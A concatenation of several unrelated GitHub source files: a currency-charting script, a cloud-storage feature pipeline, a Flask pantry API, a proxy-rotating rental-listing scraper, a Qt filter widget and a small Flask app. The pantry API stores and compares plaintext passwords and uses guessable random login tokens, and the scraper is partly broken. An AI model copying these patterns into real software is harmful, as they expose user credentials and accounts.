la serie no es ni real ni nominal\")\r\n #\r\n #\r\n # DEFINE EL RANGO DEL CHART\r\n # \r\n puntos = -1*int(puntos)\r\n #\r\n #\r\n #Rango inicial. La serie puede identificarse como 0 (el primer dato de la serie) o como un numero negativo comenzando desde el final de la serie\r\n rango_inicial = puntos\r\n #\r\n #Rango final. 
La serie puede identificarse como 0 (el primer dato de la serie) o como un numero negativo comenzando desde el final de la serie\r\n # 0 es el final de la serie pero se debe completar ni con \"\" ni con 0\r\n rango_final = -1\r\n #\r\n #\r\n # GRAFICA\r\n #\r\n # Da la orden de graficar el rango\r\n ax = df[[serie]].iloc[rango_inicial:rango_final].plot(color ='k', linestyle = '-', figsize =(12,12), linewidth = 1 ) #18,12 es grande\r\n #\r\n #\r\n # Activa las medias moviles o las desactiva\r\n #\r\n df['MA200'].iloc[rango_inicial:rango_final].plot(ax=ax, label ='MA200', color ='g', linestyle = '-', linewidth = 1, ) #18,12 es grande\r\n df['MA100'].iloc[rango_inicial:rango_final].plot(ax=ax, label ='MA100', color ='r', linestyle = '-', linewidth = 1 ) #18,12 es grande\r\n #df['MA50'].iloc[rango_inicial:rango_final].plot(ax=ax, label ='MA50', color ='y', linestyle = '-', linewidth = 1 ) #18,12 es grande\r\n #df['MA25'].iloc[rango_inicial:rango_final].plot(ax=ax, label ='MA25', color ='m', linestyle = '-', linewidth = 1 ) #18,12 es grande\r\n #\r\n #\r\n # Define el titulo como una variable string\r\n title = \"Tipo de cambio \" + tipo_de_cambio + \" \" + ticker\r\n plt.title(title)\r\n # \r\n # \r\n # Add a legend\r\n #\r\n #plt.legend('off')\r\n #\r\n # Situa la leyenda arriba a la izquierda (loc=2)\r\n plt.legend(loc=2)\r\n # \r\n # Pone los labels del eje x de forma vertical\r\n plt.xticks(rotation='vertical')\r\n #\r\n # Define el margen de cuan pegados estan los labels entre si del eje x. cuanto mas pequeno empieza a ser neceseario mostrar mas detalle en los labels.\r\n plt.margins(0.1)\r\n #\r\n #Distancia desde el fondo del chart (corre la altura del eje x en el dibujo. Tweak spacing to prevent clipping of tick-labels\r\n plt.subplots_adjust(bottom=0.25)\r\n #\r\n #Define el label del eje x como una variable string\r\n x_label = \"Fecha\"\r\n #\r\n #Define el xlabel, x=1 estaria en el limite inferior derecho, x=0.50 estaria casi en el medio\r\n plt.xlabel(x_label, fontsize=9, x=0.50, y=0.10)\r\n #\r\n #Define el label del eje y como una variable string\r\n y_label = \"en ARS por USD\"\r\n #\r\n #Define el ylabel, y=1 estaria en el limite superior, y=0.50 estaria casi en el medio\r\n plt.ylabel(y_label, fontsize=9, x=0.10, y=0.50)\r\n #\r\n #\r\n plt.axis('on') \r\n #Dibuja una recta horizontal en y = 600 de color azul\r\n #plt.axhline(y = 600, xmin = 0, xmax = 250000)\r\n ##Dibuja una recta horizontal en y = 0 de color rojo\r\n #plt.axhline(color = 'r')\r\n plt.grid(True)\r\n plt.grid(color = 'k') #r=red b=blue g=green y=yellow c=cian w=white m=magenta k=black\r\n plt.grid(linestyle = ':') # '-' = linea solida, '--' = linea a rayas,'-.' 
= puntos y rayas, ':' = linea punteada,\r\n plt.grid(linewidth=1) # 1 es lo mas finito, 20 es grueso\r\n plt.text(500, 300, \"Más texto\", fontsize = 200)\r\n #\r\n # Define que el formato de los numeros del eje y sean con coma para separar los miles \r\n ax.yaxis.set_major_formatter(mpl.ticker.StrMethodFormatter('{x:,.0f}'))\r\n #\r\n # AGREGA FOOTNOTE\r\n #plt.text(0.5, 0.5, \"Fuente: BCRA, GCB CAPITAL\", fontsize=12, horizontalalignment='center', verticalalignment='center')\r\n plt.annotate('Fuente: BCRA, GCB CAPITAL', (0,0), (-70, -100), xycoords='axes fraction', textcoords='offset points', va='top')\r\n #\r\n #\r\n # PROBLEMA\r\n import matplotlib.dates as mdates\r\n #ax.xaxis.set_major_formatter(mdates.DateFormatter('%Y-%m-%d')\r\n #ax.xaxis.set_major_formatter(mdates.DateFormatter('%Y-%m-%d %H:%M:%S'))\r\n ax.xaxis.set_major_formatter(mdates.DateFormatter('%Y-%m-%d '))\r\n #\r\n # Save Figure\r\n #\r\n # Location jamas termina con una barra\r\n location = \"C:\\GCB_CAPITAL\\CURRENCIES\"\r\n #\r\n # Slash es la barra\r\n slash = str(\"//\")\r\n #\r\n # Filename parte 1 es un nombre que le agrega el programa a los archivos\r\n file_name_parte1 = \"\"\r\n #\r\n # Filename parte 2 es el ticker\r\n file_name_parte2 = ticker\r\n #\r\n # file_name es el total del nombre del archivo incluyendo al ticker que lo identifica \r\n file_name = file_name_parte1 + file_name_parte2 \r\n #\r\n # Extension es la extension del archivo\r\n #\r\n df.tail(1).index # para buscar la ultima fecha de la serie\r\n intermedio = str(df.tail(1).index) # Transformamos en una variable string\r\n b = intermedio[16:26] # Extraemos el dato de la fecha del ultimo dia de la serie en formato STRING\r\n extension = \"_\" + str(b)\r\n #\r\n # Path es el todo la linea para llegar al archivo\r\n path = location + slash + file_name + extension\r\n #print (path)\r\n #\r\n # Graba en formato png. 
Fijarse que no hay que poner la extension.\r\n # A Modo de Ejemplo seria: plt.savefig('C:\\GCB_CAPITAL\\myfig')\r\n plt.savefig(path)\r\n plt.show() # lo desactive para poder grabar todos los archivos\r\n return\r\n\r\n#paint_currency(\"USDARS_LIBRE\", \"1000\") #Ultimos 1000 puntos\r\n#paint_currency(\"USDARS_LIBRE\", \"261\") #Ultimo año\r\n#paint_currency(\"USDARS_LIBRE\", \"0\") #Serie Historica\r\n\r\n#paint_currency(\"USDARS_BCRA\", \"1000\") #Ultimos 1000 puntos\r\n#paint_currency(\"USDARS_BCRA\", \"261\") #Ultimo año\r\n#paint_currency(\"USDARS_BCRA\", \"0\") #Serie Historica\r\n\r\n#open_file_currency(\"USDARS_PPP\")\r\n#paint_currency(\"USDARS_PPP\", \"1000\") #Ultimos 1000 puntos\r\n#paint_currency(\"USDARS_PPP\", \"261\") #Ultimo año\r\n#paint_currency(\"USDARS_PPP\", \"0\") #Serie Historica\r\n\r\n","repo_name":"gcbockelmann/09_MAR_2020_CASA","sub_path":"D3470_chart_currency.py","file_name":"D3470_chart_currency.py","file_ext":"py","file_size_in_byte":7248,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"1019850077","text":"# This tool takes the raw usage data and splits it into session files\n\nfrom google.cloud import storage\nimport os\nimport time\n\nimport gzip\nimport json\nimport base64\nimport sys\nimport traceback\nimport time\nimport random\n\nfrom storage_utils import download_blob, upload_blob, log, storage_client\nfrom feature_usage_extractor import extract, VERSION\n# import storage_utils\n\nMAX_MEM = 1 * 1000 * 1000 * 1000\n\nSESSIONS_BUCKET = \"dynamo_instrumentation_sessions\"\nFEATURES_BUCKET = \"dynamo_instrumentation_features\"\n\ndef sorted_session_name_to_features_name(sorted_session_name):\n features_name = \"{}.features.{}\".format(sorted_session_name, VERSION)\n return features_name\n\ndef get_blob_names_to_process(folder_id_str = None):\n if folder_id_str is None:\n folder_id = random.randint(0, 16*16*16)\n folder_id_str = (\"%x\" % folder_id).zfill(3)\n\n print (\"Selected folder: {}\".format(folder_id_str))\n sessions_blob_to_date_map = {}\n blobs_requiring_extraction = set()\n\n bucket = storage_client.get_bucket(SESSIONS_BUCKET) \n sessions_blobs = bucket.list_blobs(prefix=folder_id_str, delimiter=None)\n for sessions_blob in sessions_blobs:\n blob_name = sessions_blob.name\n if not blob_name.endswith('.sorted.gz'):\n continue\n blob_udpated = sessions_blob.updated\n sessions_blob_to_date_map[blob_name] = blob_udpated\n log(\"Blobs ({}): {}\".format(SESSIONS_BUCKET, len(sessions_blob_to_date_map.keys())))\n \n featuress_blob_to_date_map = {}\n bucket = storage_client.get_bucket(FEATURES_BUCKET)\n features_blobs = bucket.list_blobs(prefix=folder_id_str, delimiter=None)\n for feature_blob in features_blobs:\n blob_name = feature_blob.name\n blob_udpated = feature_blob.updated\n featuress_blob_to_date_map[blob_name] = blob_udpated\n log(\"Blobs ({}): {}\".format(FEATURES_BUCKET, len(featuress_blob_to_date_map.keys())))\n\n\n missing = 0\n update = 0\n already_done = 0\n\n for session_blob in sessions_blob_to_date_map.keys():\n features_name = sorted_session_name_to_features_name(session_blob)\n if features_name not in featuress_blob_to_date_map.keys():\n missing += 1\n blobs_requiring_extraction.add(session_blob)\n continue\n \n session_updated = sessions_blob_to_date_map[session_blob]\n features_updated = featuress_blob_to_date_map[features_name]\n\n if session_updated >= features_updated:\n update += 1\n blobs_requiring_extraction.add(session_blob)\n continue\n\n already_done += 1\n \n 
log(\"Feature extraction needed: {} | {} (missing), {} (update) | {} (already_done)\"\n .format(len(blobs_requiring_extraction), missing, update, already_done))\n return list(blobs_requiring_extraction)\n\n\ndef extract_features(blob_name, features_blob_name, temp_path):\n log(\"Extract features for ({}): {} => {}\".format(VERSION, blob_name, features_blob_name))\n\n blob_session_name = blob_name.split('/')[-1]\n features_session_name = features_blob_name.split('/')[-1]\n\n blob_path_to_proc = os.path.join(temp_path, blob_session_name)\n out_path = os.path.join(temp_path, features_session_name)\n \n log (\"Downloading {} => {}\".format(blob_name, blob_path_to_proc))\n download_blob(SESSIONS_BUCKET, blob_name, blob_path_to_proc)\n\n extract(blob_path_to_proc, out_path)\n log(\"Features extracted: {} => {}\".format(blob_path_to_proc, out_path))\n\n if not os.path.exists(out_path):\n return False\n \n upload_blob(FEATURES_BUCKET, out_path, features_blob_name)\n\n log(\"About to remove: {}\".format(blob_path_to_proc))\n os.remove(blob_path_to_proc)\n \n log(\"About to remove: {}\".format(out_path))\n os.remove(out_path)\n\n return True\n\ndef process_blob_names(blob_names_to_process):\n log (\"Blobs to process: {}\".format(len(blob_names_to_process)))\n for blob_name in blob_names_to_process:\n features_blob_name = sorted_session_name_to_features_name(blob_name)\n result = extract_features(blob_name, features_blob_name, DATA_FILES_TEMP_PATH)\n\n if not result:\n print (\"WARNING: failed to process: {}\".format(blob_name))\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) < 2 or len(sys.argv) > 3:\n print (\"Usage: temp_path [linear]\")\n print (\"Extract features for sessions\")\n print \n exit(1)\n\n DATA_FILES_TEMP_PATH = sys.argv[1]\n LINEAR = False\n if len(sys.argv) == 3 and sys.argv[2] == \"linear\":\n log (\"Linear mode\")\n LINEAR = True\n\n if LINEAR:\n for i in range(16*16*16):\n folder_id_str = (\"%x\" % i).zfill(3)\n blob_names_to_process = get_blob_names_to_process(folder_id_str)\n process_blob_names(blob_names_to_process)\n else:\n blob_names_to_process = get_blob_names_to_process()\n process_blob_names(blob_names_to_process)\n","repo_name":"DynamoDS/Coulomb","sub_path":"Pipeline/sorted_sessions_to_features.py","file_name":"sorted_sessions_to_features.py","file_ext":"py","file_size_in_byte":4923,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"45"} +{"seq_id":"17626403671","text":"import flask\nfrom flask import request, jsonify\nimport json\nfrom ingredient_matcher import findCommonNameFromOfficial\nimport requests\nimport mysql.connector\nimport database_connector as dbConnector\nimport urllib.parse\nimport random\nfrom datetime import datetime \n# ref: https://programminghistorian.org/en/lessons/creating-apis-with-python-and-flask\napp = flask.Flask(__name__)\napp.config[\"DEBUG\"] = True\napp.url_map.strict_slashes = False\n\n\n@app.route('/', methods=['GET'])\ndef home():\n return \"
    hello
    \"\n\n\n@app.route('/api/barcode/', methods=['GET'])\ndef barcode():\n \"\"\"\n Handles getting the official name from the barcode API\n\n INPUT:\n Expects the barcode in the url as an argument, i.e \n /api/barcode/?barcode=NNN\n\n \n OUTPUT:\n {\n \"Status\": \"OK\" \n \"Official Name\": \"Rossco Thin Spaghetti\"\n }\n\n Sample Curl:\n curl http://127.0.0.1:5000/api/barcode/?barcode=737628064502\n \"\"\"\n params = request.args\n api_response_json = None\n response_dict = {}\n response_dict[\"Status\"] = \"ERROR\"\n try: # catch spaghetti o's error\n if 'barcode' in params:\n barcode = params['barcode']\n\n api_response = requests.get(\n 'https://world.openfoodfacts.org/api/v0/product/{0}.json'.\n format(barcode))\n api_response_json = api_response.json()\n\n if api_response_json['status_verbose'] == 'product found':\n response_dict['Status'] = \"OK\"\n response_dict[\"Official Name\"] = api_response_json[\"product\"][\"product_name_en\"] \n all_nutrition_info = api_response_json[\"product\"][\"nutriments\"]\n parsed_nutrition_info = {}\n parsed_nutrition_info[\"Status\"] = \"ERROR\"\n nutrition_fields = [\"fat\",\"carbohydrates\",\"cholesterol\",\"proteins\",\"sodium\" ]\n\n nutrion_fields_read = 0 \n for entry in nutrition_fields:\n try: \n parsed_nutrition_info[entry] = all_nutrition_info[entry] \n nutrion_fields_read += 1\n except:\n pass\n if nutrion_fields_read >= 1:\n parsed_nutrition_info[\"Status\"] = \"OK\"\n response_dict[\"Nutrition\"] = parsed_nutrition_info\n response_dict[\"Category\"] = \"Misc\"\n try:\n cat = api_response_json[\"product\"][\"categories_tags\"][0]\n if 'en:' in cat:\n response_dict[\"Category\"] = cat[cat.index('en:')+len('en:'):]\n except:\n pass\n return response_dict\n else:\n response_dict['Status'] = \"NOT_FOUND\"\n return response_dict\n except:\n response_dict['Status'] = \"NOT_FOUND\"\n return response_dict\n\n@app.route('/api/selection/', methods=['POST'])\ndef selection():\n \"\"\"\n Handles converting the selected parts of a scanned item official name into their common ingredient names.\n\n INPUT:\n Expects a JSON object in the request data that is in this format:\n {\n \"Selection\": [\n \"Spaghetti\", \n ],\n \"Official Name\": \"Rossco Thin Spaghetti\"\n }\n\n \n OUTPUT:\n { \n \"Category\": \"Long Noodles\",\n \"Common Name\": \"spaghetti\",\n \"Official Name\": \"Rossco Thin Spaghetti\"\n }\n\n\n Sample curl tester:\n curl -d '{\"Selection\": [\"spaghetti\"], \"Official Name\": \"Rossco Thin Spaghetti\"}' -H \"Content-Type: application/json\" -X POST http://127.0.0.1:5000/api/selection/\n \"\"\"\n info_dict = request.json\n\n user_selection = info_dict[\"Selection\"]\n response_dict = {}\n response_dict['Status'] = \"ERROR\"\n try:\n data = findCommonNameFromOfficial(user_selection)\n if data[1] == -1:\n data = findCommonNameFromOfficial(user_selection, True)\n response_dict['Status'] = \"OK\"\n response_dict['Ingredient ID'] = data[1]\n response_dict['Official Name'] = info_dict[\"Official Name\"]\n response_dict['Category'] = \"DEPREICATED\"\n response_dict['Common Name'] = data[0]\n except:\n pass\n return response_dict\n\n\n@app.route('/api/user/get/', methods=['POST'])\ndef userinfo():\n info_dict = request.json\n key = info_dict[\"key\"]\n response = {}\n response[\"Status\"] = \"ERROR\"\n try:\n user = dbConnector.getUserInfoFromKey(key)\n if user:\n response[\"Status\"] = \"OK\"\n response[\"Display Name\"] = user[\"display_name\"]\n response[\"pantry_id\"] = user[\"pantry_id\"]\n else:\n response[\"Status\"] = \"INVALID 
TOKEN\"\n except:\n print(\"No database connection\")\n pass\n return response\n\n@app.route('/api/user/new/', methods=['POST'])\ndef makeNewUser():\n \"\"\" \n Handles adding a new user to the database\n\n INPUT:\n Expects a JSON object in the request data that is in this format:\n {\n \"password\": \"password\",\n \"email\": \"email@email.com\",\n \"display_name\" \"Display Name\"\n }\n\n \n OUTPUT:\n { \n \"Status\": \"OK\", \n }\n\n\n TODO:\n -Hash Passwords Before Sending\n -Email Verification\n -Handle different cases in the response i.e\n -Invalid Password\n -Invalid Email\n \n Sample curl tester: \n curl -d '{\"email\":\"rhys@rhyssullivan.com\", \"password\":\"passowrd\", \"display_name\":\"rhysS\"}' -H \"Content-Type: application/json\" -X POST http://127.0.0.1:5000/api/user/new \n \"\"\"\n\n # TODO ADD ERROR HANDLING\n info_dict = request.json\n password = info_dict['password']\n username = info_dict['email']\n display_name = info_dict['display_name']\n\n dbConnector.addNewUser(username, password, display_name)\n\n login_token = random.randrange(\n 0, 1000000) # TODO: Generate on client? Encrypt before sending back?\n response_dict = {}\n while (dbConnector.checkIfTokenIsInUse(login_token)):\n login_token = random.randrange(0, 1000000)\n\n user_info = dbConnector.getUserInformation(username)\n dbConnector.updateUserLoginToken(user_info[0], login_token)\n response_dict = {}\n response_dict[\"login_token\"] = login_token\n response_dict[\"Status\"] = \"OK\"\n\n try:\n user = dbConnector.getUserInfoFromKey(login_token)\n if user: \n response_dict[\"Display Name\"] = user[\"display_name\"]\n response_dict[\"pantry_id\"] = user[\"pantry_id\"] \n except:\n print(\"No database connection\")\n pass\n\n return response_dict\n\n@app.route('/api/user/login/', methods=['POST'])\ndef login():\n info_dict = request.json\n password = info_dict['password']\n email = info_dict['email']\n\n user_info = dbConnector.getUserInformation(email)\n\n response_dict = {}\n response_dict[\"Status\"] = \"ERROR\" \n try:\n server_password = user_info[2] # TODO Split up into specific password call? Indexing directly is ugly and insecure\n display_name = user_info[3] \n if server_password == password:\n response_dict[\"display_name\"] = display_name\n response_dict[\"Status\"] = \"OK\"\n response_dict[\"pantry_id\"] = user_info[5]\n \n login_token = random.randrange(0, 1000000) # TODO: Generate on client? Encrypt before sending back? 
\n while (dbConnector.checkIfTokenIsInUse(login_token)):\n login_token = random.randrange(0, 1000000)\n\n dbConnector.updateUserLoginToken(user_info[0], login_token)\n response_dict[\"login_token\"] = login_token\n return response_dict\n else:\n response_dict[\"Status\"] = \"INVALID PASSWORD\"\n return response_dict\n except TypeError:\n response_dict[\"Status\"] = \"INVALID EMAIL\"\n return response_dict\n\n@app.route('/api/user/pantry/get/', methods=['POST'])\ndef getUserPantryItems():\n # curl -d '{\"key\":868911}' -H \"Content-Type: application/json\" -X POST http://127.0.0.1:5000/api/user/pantry/get\n info_dict = request.json\n key = info_dict[\"key\"]\n response = {}\n response[\"Status\"] = \"OK\"\n user = dbConnector.getUserInfoFromKey(key)\n if user:\n pantry_items = dbConnector.getAllItemsInPantry(user[\"pantry_id\"])\n\n items = []\n for item in pantry_items:\n item_dict = {}\n item_dict[\"name\"] = item[4]\n item_dict[\"dispName\"] = item[4]\n item_dict[\"quantity\"] = item[9]\n try: \n exp_date_str = item[2] \n formatted_date = exp_date_str.strftime('%B %dth, %Y') \n item_dict[\"expDate\"] = formatted_date \n except:\n item_dict[\"expDate\"] = \"\"\n item_dict[\"price\"] = item[6]\n item_dict[\"id\"] = item[5]\n items.append(item_dict)\n if len(items) != 0:\n response[\"items\"] = items\n else:\n response[\"Status\"] = \"EMPTY\"\n else:\n response[\"Status\"] = \"INVALID TOKEN\"\n return response\n\n@app.route('/api/user/pantry/add/', methods=['POST'])\ndef addUserPantryItem():\n info_dict = request.json\n key = info_dict[\"key\"]\n user = dbConnector.getUserInfoFromKey(key)\n pantry_item = info_dict # TODO: Add input validation\n response_dict = {}\n if user:\n dbConnector.addItem(user[\"pantry_id\"], pantry_item)\n response_dict[\"Status\"] = \"OK\"\n else:\n response_dict[\"Status\"] = \"INVALID TOKEN\"\n return response_dict\n\n\n@app.route('/api/user/pantry/remove/', methods=['POST'])\ndef removeUserPantryItem():\n info_dict = request.json\n key = info_dict[\"key\"]\n user = dbConnector.getUserInfoFromKey(key)\n response_dict = {}\n try:\n item_id = info_dict[\"item_id\"]\n print(item_id)\n except:\n response_dict[\"Status\"] = \"INVALID ITEM ID\"\n return response_dict\n if user:\n dbConnector.deleteItemFromPantry(user[\"pantry_id\"], item_id)\n response_dict[\"Status\"] = \"OK\"\n else:\n response_dict[\"Status\"] = \"INVALID TOKEN\"\n return response_dict\n\n\n@app.route('/api/user/pantry/recipes/matching', methods=['POST'])\ndef getMatchingRecipes():\n # curl -d '{\"key\":'685309'}' -H \"Content-Type: application/json\" -X POST http://127.0.0.1:5000/api/user/pantry/recipes/matching\n info_dict = request.json\n key = info_dict[\"key\"]\n user = dbConnector.getUserInfoFromKey(key)\n response_dict = {}\n if user:\n try:\n recipe_matches = dbConnector.getMatchingRecipes(user[\"pantry_id\"], min_number_matched_ingredients=3)\n response_dict[\"Status\"] = \"OK\"\n recipe_ids = [x[1] for x in recipe_matches]\n \n mat = dbConnector.getRecipesByIDs(recipe_ids)\n if len(mat) > 10:\n mat = mat[:9]\n response_dict[\"recipes\"] = mat\n except:\n response_dict[\"Status\"] = \"NO MATCHES\"\n else:\n response_dict[\"Status\"] = \"INVALID TOKEN\"\n return response_dict\n\n@app.route('/api/user/pantry/nutrition/', methods=['POST'])\ndef getPantryNutritionInfo():\n info_dict = request.json\n key = info_dict[\"key\"]\n user = dbConnector.getUserInfoFromKey(key) \n response_dict = {}\n if user: \n response_dict[\"Status\"] = \"OK\"\n try:\n response_dict[\"Nutrition Info\"] = 
dbConnector.getPantryNutritionInfo(user[\"pantry_id\"])\n except:\n response_dict[\"Status\"] = \"ERROR\" \n else:\n response_dict[\"Status\"] = \"INVALID TOKEN\"\n return response_dict\n \n@app.route('/api/user/pantry/price/', methods=['POST'])\ndef getPantryPriceInfo():\n info_dict = request.json\n key = info_dict[\"key\"]\n user = dbConnector.getUserInfoFromKey(key)\n response_dict = {}\n if user: \n response_dict[\"Status\"] = \"OK\"\n response_dict[\"Price Info\"] = dbConnector.getPantryPriceInfo(user[\"pantry_id\"])\n else:\n response_dict[\"Status\"] = \"INVALID TOKEN\"\n return response_dict\n\n@app.route('/api/user/update/name/', methods=['POST'])\ndef changeName():\n info_dict = request.json\n key = info_dict[\"key\"]\n response = {}\n response[\"Status\"] = \"OK\"\n user = dbConnector.getUserInfoFromKey(key)\n if user:\n try: \n new_name = info_dict[\"new_name\"] \n print(new_name) \n dbConnector.changeName(new_name, key)\n except:\n pass \n else:\n response[\"Status\"] = \"INVALID TOKEN\"\n return response\n\n@app.route('/api/user/pantry/join/', methods=['POST'])\ndef changePantry():\n info_dict = request.json\n key = info_dict[\"key\"]\n response = {}\n response[\"Status\"] = \"OK\"\n user = dbConnector.getUserInfoFromKey(key)\n if user:\n try: \n new_pantry_id = info_dict[\"new_id\"] \n dbConnector.changePantry(new_pantry_id, key)\n except:\n pass \n else:\n response[\"Status\"] = \"INVALID TOKEN\"\n return response\n\nif __name__ == '__main__':\n app.run(host=\"0.0.0.0\")","repo_name":"cLaBounty/Shelf-Life","sub_path":"Server/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":13569,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"45"} +{"seq_id":"17402205559","text":"'''\n爬取链家租房信息\n'''\n\nimport requests\nfrom bs4 import BeautifulSoup\nimport pandas as pd\n\n\n\ndef text():\n ips = [\"115.219.108.246:8010\", \"117.88.5.135:3000\", \"114.223.208.165:8118\"]\n Lists = []\n for page in range(2,100):\n url = \"https://sz.lianjia.com/zufang/pg%s/#contentList\" % page\n headers = {'User-Agent':'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36'}\n ip = ips[-1]\n IP = {'http': ip}\n data = requests.get(url=url, headers=headers, proxies=IP)\n # data = requests.get(url=url,headers=headers)\n data = data.text\n if data.status_code == 200:\n soup = BeautifulSoup(data, 'lxml', from_encoding='utf-8')\n data = soup.select('div[class=\"content__list\"]')[0]\n data1 = data.select('div[class=\"content__list--item\"]')\n for i in data1:\n data = i.select('div[class=\"content__list--item--main\"]')[0]\n des = data.select('p[class=\"content__list--item--des\"]')[0]\n diqu = des.find_all(\"a\")[0].text\n jiedao = des.find_all(\"a\")[1].text\n xiaoqu = des.find_all(\"a\")[2].text\n mianji = des.find_all(\"i\")[0].next_sibling.strip()\n price = data.select('span[class=\"content__list--item-price\"]')[0]\n price = price.text\n Lists.append([diqu, jiedao, xiaoqu, mianji, price])\n # print(diqu,jiedao,xiaoqu,mianji,price)\n else:\n ips.pop()\n print(\"在第%s次IP被封\" % i)\n # print(s)\n continue\n return pd.DataFrame(Lists, columns=['地区', '街道', '小区', '面积', '租金'])\n\n\nprint(text())\n\ndf = text()\ndf.to_csv('链家.csv', encoding='utf_8_sig', index=False)","repo_name":"qianxunchen/Reptiles","sub_path":"链家房源.py","file_name":"链家房源.py","file_ext":"py","file_size_in_byte":1836,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} 
+{"seq_id":"32916578808","text":"import logging\r\nimport os\r\nimport sys\r\nfrom typing import List, Optional, Tuple\r\n\r\nfrom PySide2.QtCore import *\r\nfrom PySide2.QtGui import *\r\nfrom PySide2.QtWidgets import *\r\n\r\nfrom qspreadsheet import resources_rc\r\nfrom qspreadsheet.common import LEFT, SER, standard_icon\r\nfrom qspreadsheet.custom_widgets import LabeledLineEdit\r\nfrom qspreadsheet.dataframe_model import DataFrameModel\r\nfrom qspreadsheet.worker import Worker\r\n\r\nlogger = logging.getLogger(__name__)\r\n\r\n\r\nclass FilterWidgetAction(QWidgetAction):\r\n \"\"\"Checkboxed list filter menu\"\"\"\r\n\r\n all_deselected = Signal(bool)\r\n\r\n def __init__(self, parent=None) -> None:\r\n \"\"\"Checkbox list filter menu\r\n\r\n Arguments\r\n ----------\r\n \r\n parent: (Widget)\r\n Parent\r\n \r\n menu: (QMenu)\r\n Menu object this list is located on\r\n \"\"\"\r\n super(FilterWidgetAction, self).__init__(parent)\r\n\r\n # Build Widgets\r\n widget = QWidget()\r\n layout = QVBoxLayout()\r\n\r\n self.str_filter = LabeledLineEdit('Filter', parent=parent)\r\n layout.addWidget(self.str_filter)\r\n\r\n self.list = QListWidget(widget)\r\n self.list.setStyleSheet(\"\"\"\r\n QListView::item:selected {\r\n background: rgb(195, 225, 250);\r\n color: rgb(0, 0, 0);\r\n } \"\"\")\r\n self.list.setMinimumHeight(150)\r\n self.list.setUniformItemSizes(True)\r\n\r\n layout.addWidget(self.list)\r\n\r\n # This button in made visible if the number \r\n # of items to show is more than the initial limit\r\n btn = QPushButton('Not all items showing')\r\n \r\n btn.setIcon(standard_icon('MessageBoxWarning'))\r\n btn.setVisible(False)\r\n layout.addWidget(btn)\r\n self.show_all_btn = btn\r\n self.select_all_item: Optional[QListWidgetItem] = None\r\n\r\n widget.setLayout(layout)\r\n self.setDefaultWidget(widget)\r\n\r\n # Signals/slots\r\n self.list.itemChanged.connect(self.on_listitem_changed)\r\n self.num_checked = 0\r\n \r\n def addItem(self, item: QListWidgetItem):\r\n if item.checkState() == Qt.Checked:\r\n self.num_checked += 1\r\n self.list.addItem(item)\r\n\r\n def addSelectAllItem(self, state: Qt.CheckState) -> QListWidgetItem:\r\n \"\"\"Adding '(Select All)' item at the beginning of the QListWidget\"\"\"\r\n item = QListWidgetItem('(Select All)')\r\n item.setFlags(item.flags() | Qt.ItemIsUserCheckable)\r\n item.setCheckState(state)\r\n self.select_all_item = item\r\n self.list.insertItem(0, item)\r\n\r\n return item\r\n\r\n def clear(self):\r\n self.list.clear()\r\n self.num_checked = 0\r\n self.all_deselected.emit(True)\r\n\r\n @property\r\n def list_items_count(self) -> int:\r\n \"\"\"Number of list items, excluding the '(Select All)' item\"\"\"\r\n return self.list.count() - 1\r\n \r\n def on_listitem_changed(self, item: QListWidgetItem):\r\n\r\n self.list.blockSignals(True)\r\n if item is self.select_all_item:\r\n # Handle \"select all\" item click\r\n state = item.checkState()\r\n # Select/deselect all items\r\n for i in range(self.list.count()):\r\n itm = self.list.item(i)\r\n if itm is self.select_all_item:\r\n continue\r\n itm.setCheckState(state)\r\n \r\n all_unchecked = (state == Qt.Unchecked)\r\n # -1 is for the select_all_item\r\n self.num_checked = 0 if all_unchecked else self.list_items_count\r\n else:\r\n # Non \"select all\" item \r\n if item.checkState() == Qt.Unchecked:\r\n self.num_checked -= 1\r\n elif item.checkState() == Qt.Checked:\r\n self.num_checked += 1\r\n assert(self.num_checked >= 0)\r\n \r\n # figure out what \"select all\" should be\r\n state = Qt.Checked 
if self.num_checked == self.list_items_count else Qt.Unchecked\r\n # if state changed\r\n if state != self.select_all_item.checkState():\r\n self.select_all_item.setCheckState(state)\r\n\r\n if self.num_checked == 0:\r\n self.all_deselected.emit(True)\r\n else:\r\n self.all_deselected.emit(False)\r\n\r\n self.list.scrollToItem(item)\r\n self.list.blockSignals(False)\r\n\r\n def values(self) -> List[str]:\r\n checked = []\r\n for i in range(self.list.count()):\r\n itm = self.list.item(i)\r\n if itm is self.select_all_item:\r\n continue\r\n if itm.checkState() == Qt.Checked:\r\n checked.append(itm.text())\r\n return checked\r\n","repo_name":"stanislavsabev/qspreadsheet.old","sub_path":"qspreadsheet/menus.py","file_name":"menus.py","file_ext":"py","file_size_in_byte":4770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"38881957847","text":"# Main Context\n# Author: NaveenKumar Namachivayam at QAInsights.com\n\nfrom flask import Flask, render_template, request, redirect, url_for, flash, jsonify\nfrom explain import explain_commands\n\napp = Flask(__name__, template_folder='templates', static_folder='static')\n\n\n@app.route('/', methods=['GET'])\ndef home():\n return render_template('home.html', isHome=True)\n\n\n@app.route('/explain', methods=['GET'])\ndef explain():\n commands = request.args['usercommand'].strip()\n commands = commands.split(' ')\n print(f\"User input is {commands}\")\n result = {}\n try:\n for command in commands:\n print(f\"from the form {command}\")\n k, v = explain_commands(command)\n print(f\"In main {k} {v}\")\n result[k] = v\n print(result)\n except TypeError:\n pass\n return render_template('explain.html', string=result)\n\n\nif __name__ == '__main__':\n app.run(port=7000, debug=True)","repo_name":"QAInsights/Explain-JMeter","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"45"} +{"seq_id":"29634095605","text":"from __future__ import absolute_import, division, print_function\n__metaclass__ = type\n\nANSIBLE_METADATA = {\n 'metadata_version': '1.1',\n 'status': ['preview'],\n 'supported_by': 'community'\n}\n\nDOCUMENTATION = '''\n---\nmodule: snow_record_find\n\nshort_description: Search for multiple records from ServiceNow\n\nversion_added: \"2.5\"\n\ndescription:\n - Gets multiple records 